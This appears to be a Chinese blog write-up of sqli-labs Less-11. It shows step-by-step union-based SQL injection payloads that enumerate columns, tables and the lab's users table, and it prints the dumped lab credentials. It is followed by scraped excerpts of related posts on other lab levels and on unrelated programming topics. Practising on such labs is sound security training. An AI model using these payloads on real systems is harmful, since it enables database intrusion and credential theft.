sqli-labs修炼の道 less-11

首先判断字段数目

Payload语句: admin‘ order by 2—s

  

正常显示故字段数目大于等于2

Payload语句: admin‘ order by 3—s

显示位置字段,结合前面的所以字段数为2

构造联合查询语句Payload发现显示位

显示位为1,2

Payload: adm‘ union select 1,2—s

注入查询当前用户以及当前数据库

Payload: adm‘ union select user(),database()—s

构造语句显示当前数据库的所有表名:

表名:emails,referers,uagents,users

Payload: adm‘ union select group_concat(table_name),database() from information_schema.tables where table_schema=‘security‘—s

我们所需要的信息在users表中故

字段名: id,username,password

我们来查询username,password字段的内容

Username: Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Password:Dumb,I-kill-you,[email protected],crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

Username与Password一一对应

Payload: adm‘ union select group_concat(username),group_concat(password) from users-- s
时间: 2024-08-26 07:51:42

sqli-labs修炼の道 less-11的相关文章

Sqli labs系列-less-1 详细篇

要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了,我就开始弄这个,毕竟这个里面涉及到的 SQL 注入知识很全,我贴一个下载地址:Sqli labs系列下载地址 对了还有我这个系列的头顶图,那个图是某个低调群的活跃用户装X墙,纯属装 X ,娱乐着玩了,大家别当真哈. 开了正文开始了! 首先我们先开始第一关,然后构造下注入环境,也就是在 http://

Sqli labs系列-less-2 详细篇

就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊...好歹我也是上打过网络安全攻防平台,注入卡在第七关,我下玩过 web_for_pentester ,web渗透靶机2pentester_II_i386,这些靶场的小菜比... 好了,不扯了,现在开始扯这个第二关. 原本想着明天闲着没事了玩玩吧,后来,我今天也是闲的没事,我就继续开始玩玩吧. 结果玩

数据结构与算法面试题80道(11)

11.求二叉树中节点的最大距离... 如果我们把二叉树看成一个图,父子节点之间的连线看成是双向的, 我们姑且定义"距离"为两节点之间边的个数. 写一个程序, 求一棵二叉树中相距最远的两个节点之间的距离. 错误思想:分别找左右子树到根的最深结点,相加. 错误原因:左子树上的左右子树到根的最深结点相加大于根节点左右子树到根的最深结点相加 正确思想:用动态规划来记录结点左右孩子的最大距离. 正确原因:从错误原因可以知道,最大距离为某一结点到它左右孩子的最大距离和 解题方法:(1)某一结点,左

大数据系列修炼-Scala课程11

接着昨天的list,也是学习集合的相关知识 ListBuffer.ArrayBuffer.Queue.stack相关操作 1.ListBuffer.ArrayBuffer代码实现:ListBuffer与ArrayBuffer都是mutable可变的与java中的定义也差不多,可以追加的. 2.Queue.Stack相关操作:队列是一端进去一端出来,而stack也是后进先出的原则,他们都是mutable可变的 import scala.collection.mutable.ListBuffer v

Sqli labs相关环境的下载与安装

我们在学习这项内容之前,需要安装两样应用程序,下载路径的搜索比较麻烦,这里提供两个已知的百度网盘网址及其提取码以供使用: 1.安装phpstudy; 链接:https://pan.baidu.com/s/1yeOLf7Mty5bEGLPUSodILg 提取码:y3vl 2.安装sqli-labs-masters; 将sqli-labs-masters解压,放到phpStudy安装目录下的/PHPTutorial/WWW 链接:https://pan.baidu.com/s/1aKbc0fnsLg

前端修炼の道 | <div> 标签简介

<div> 标签是最基本的,同时也是最常用的标签. 该标签是一个双标签,出现在主体区域中,主要作为一个容器标签来使用,在 <div> 标签中可以包含除 <body> 之外的所有主体标签. 每一对 <div></div> 标签在 HTML 页面中都会构建一个区块,我们可以通过 <div> 将页面划分成许多大小不一的区块,以便更好地控制和布局页面内容. 因此,<div> 的主要作用就是用来对 HTML 结构进行布局. [示例

sqli labs注入记录(Less-1至Less-10)

Less-1:基于错误的GET单引号字符型注入 我们首先注入一个单引号’,出现SQL语法错误,多出一个单引号,后面闭合语句也是用的单引号: http://127.0.0.1/sqli_labs/Less-1/?id=1’ 再次注入一条SQL语句,因为条件永远为真,响应正常: http://127.0.0.1/sqli_labs/Less-1/?id=1' and '1'='1 下面猜解字段数: http://127.0.0.1/sqli_labs/Less-1/?id=1' order by 1

Atitit.attilax软件研发与项目管理之道

1. 前言4 2. 鸣谢4 3. Genesis 创世记4 4. 软件发展史4 5. 箴言4 6. 使徒行传 4 7. attilax书 4 8. 启示录4 9. 技术标准的7条原则4 9.1. 后向兼容性4 10. 软件之道5 11. 计算机科学导论(原书第3版5 12. 数字电路5 13. 通用管理学5 14. 项目管理5 15. 团队建设与人力资源管理5 16. 软件工程5 16.1. 软件编写5 16.2. 软件构件化理论与技术5 16.3. 软件与编程理论6 16.4. 理论原则6 1

必应词典手机版(IOS版)与有道词典(IOS版)之软件分析【功能篇】

1.序言: 随着手机功能的不断更新和推广,手机应用市场的竞争变得愈发激烈.这次我们选择必应词典和有道词典的苹果客户端作对比,进一步分析这两款词典的客户端在功能和用户体验方面的利弊.这次测评的主要评测人是团队PM,另有其他同学给出建议. 2.软件分析与测评: 我们选择的是必应词典(version3.2.2 for ios)和有道词典(version 5.1.2 for ios) 2.1核心功能: 2.1.1词典功能: 众所周知词典的基本功能就是查词,在查词的基础上会给出相应的英文解释,例句以及用法